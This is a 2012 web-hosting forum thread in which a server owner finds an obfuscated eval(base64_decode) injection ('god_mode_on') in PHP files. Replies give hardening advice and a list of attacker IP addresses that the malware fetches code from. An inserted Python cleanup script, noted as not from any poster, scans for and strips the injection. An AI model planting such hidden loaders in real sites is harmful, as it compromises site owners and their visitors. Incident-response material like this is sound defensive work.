The Community Forums


Has my server been hacked?

Discussion in 'Security' started by ChildOTK, Mar 15, 2012.

  1. ChildOTK

    ChildOTK Member

    Joined:
    Aug 2, 2011
    Messages:
    18
    Likes Received:
    0
    Trophy Points:
    1
    Good Day,

    We noticed this morning some really suspicious code in our files:

    Code:
    /*god_mode_on*/eval(base64_decode("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")); /*god_mode_off*/
    
    When trying to decode the string, it appears to be exactly the same code and looks like an endless loop.

    Several files have this code added and the last modified date and time was this morning at 8:05am.

    I checked /var/log/messages for activity around that time and the only thing I could find was this:

    Code:
    Mar 15 08:05:47 w1 kernel: php[12447]: segfault at 00007fff806f6ae8 rip 00002b08051a1c38 rsp 00007fff806f6ad0 error 6
    
    Does anybody have any idea what this is or what I can do about it?

    I have iptables set up as best I can on the server, and the logs didn't show any suspicious activity either, so I don't understand.

    Thank you!
     
  2. storminternet

    storminternet Well-Known Member

    Joined:
    Nov 2, 2011
    Messages:
    462
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Make sure that your server is running with an updated kernel and an updated version of mod_security. mod_security helps to prevent web-based intrusion. If the files are infected, it is better to restore them from the backup.
     
  3. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,450
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Suspend that account or accounts and hire a professional to assist you with this. My guess is that you have indeed been compromised.

    There are many good System Admin Companies listed here:
    Sys Admin Services « cPanel Application Catalog

    Assisting with cleaning up a compromised server is a bit out of the scope of these, or any forums, really.
     
  4. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    Happened to me as well today; looks like this is a mass injection!
     
  5. th3joker

    th3joker Member

    Joined:
    Mar 12, 2012
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    I would look at adding some or all of the following to harden the server:

    CSF (Firewall) free and integrates with cpanel/whm quite nicely
    fail2ban
    portsentry
    chkrootkit
    rkhunter
    securetmp
    clam (Anti Virus)

    In your hosts.allow, add your IPs, then deny all services to everyone else except httpd.

    hosts.allow on its own isn't sufficient; you should have multiple levels of security.

    If you need some help we can point you in the right direction.
     
  6. th3joker

    th3joker Member

    Joined:
    Mar 12, 2012
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Our original hosting was shared and the host company was useless; we got hacked constantly and gave up and bought our own dedicated server in the end.

    Our logs are full of hack attempts and port scans etc.
     
  7. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,450
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    If the cPanel account or website password has been compromised you'll find it very tough to stop this sort of thing from happening. Scans to find vulnerable scripts and poke them are very common.

    Keeping all scripts, and mods to them, up to date and using very strong passwords may still not be enough if the user gets infected on his local computer and all his passwords are stolen. And then used.

    There's a lot more to Hosting than just putting up a server and adding a website. Lots more. If you're unsure of how to set up good security to help protect your work, hire someone. The cost of hiring a professional is much less than the grief you go through once you've been hacked and all your customers move out, like th3joker has done.
     
  8. alphawolf50

    alphawolf50 Well-Known Member

    Joined:
    Apr 28, 2011
    Messages:
    186
    Likes Received:
    2
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    The base64 encoded string isn't an endless loop, just a long one. While you're getting this situation handled, it would be a good idea to block these specific IP addresses referenced by the attack code:

    146.185.254.245
    31.184.242.103
    91.196.216.148
    91.196.216.49

    The script downloads some (unknown) code from those IP addresses and injects it into your pages. If it can't do that, it injects some JavaScript into the pages instead. The JavaScript looks like it tries to direct the client to one of those IP addresses.

    This seems to be a WordPress exploit. This thread at wordpress.org has lots of information regarding how to clean up the issue, and how you might have gotten infected:

    WordPress › Support » I think my site has been hacked. Please Help ASAP?
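    A small triage helper for the injected statement quoted in the first post and described in the reply above, added here as an example (it is not code from any poster or from the tools named in the thread): it peels nested eval(base64_decode()) layers to show the nesting is finite rather than endless, lists files carrying the god_mode_on marker with their modification time so they can be lined up against the logs, and strips the injected statement. The `.infected` backup suffix is an assumption of this example.

```python
import base64
import os
import re
import time
# One eval(base64_decode("...")) wrapper (group 2 is the blob); with the comment
# markers around it, it is the injected statement quoted in the first post.
LAYER = r"""eval\(base64_decode\((['"])([A-Za-z0-9+/=]+)\1\)\)"""
LAYER_RE = re.compile(LAYER)
INJECT_RE = re.compile(r"/\*god_mode_on\*/\s*" + LAYER + r";\s*/\*god_mode_off\*/")

def peel_layers(blob, limit=20):
    """Decode nested wrappers until plain code remains; returns (depth, inner_text)."""
    text, depth = blob, 0
    while depth < limit:  # the limit stops a wrapper that seems to re-encode itself forever
        m = LAYER_RE.search(text)
        if not m:
            break
        text = base64.b64decode(m.group(2)).decode("utf-8", errors="replace")
        depth += 1
    return depth, text

def clean_text(text):
    """Strip every injected statement; returns (cleaned_text, number_removed)."""
    return INJECT_RE.subn("", text)

def scan_tree(root):
    """Return [(path, mtime, hits)] for every file under root carrying the marker."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:  # latin-1 round-trips any byte, so the content is read unchanged
                with open(path, encoding="latin-1") as fh:
                    hits = len(INJECT_RE.findall(fh.read()))
            except OSError:
                continue
            if hits:  # mtime lets a hit be lined up against the logs, as the OP did
                stamp = time.strftime("%Y-%m-%d %H:%M", time.localtime(os.path.getmtime(path)))
                findings.append((path, stamp, hits))
    return findings

def clean_file(path):
    """Rewrite path without the injection; the original is kept as path + '.infected' (assumed suffix)."""
    with open(path, encoding="latin-1") as fh:
        cleaned, n = clean_text(fh.read())
    if n:
        os.replace(path, path + ".infected")
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(cleaned)
    return n
```

    Run scan_tree on a copy of the web root first and review the listed files; clean_file only removes the bracketed statement, so anything else the payload changed still has to be restored from a known-good backup.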
     
  9. wpchamp

    wpchamp Registered

    Joined:
    Mar 20, 2012
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Website Owner
    Hello there,

    It appears you have been hit with the "god mode on" wordpress virus. There's a good guide on how to get rid of it here:

    http://marketingsiden.dk/how-to-remove-god_mode_on-wordpress-virus/

    Best Regards
    wpchamp
     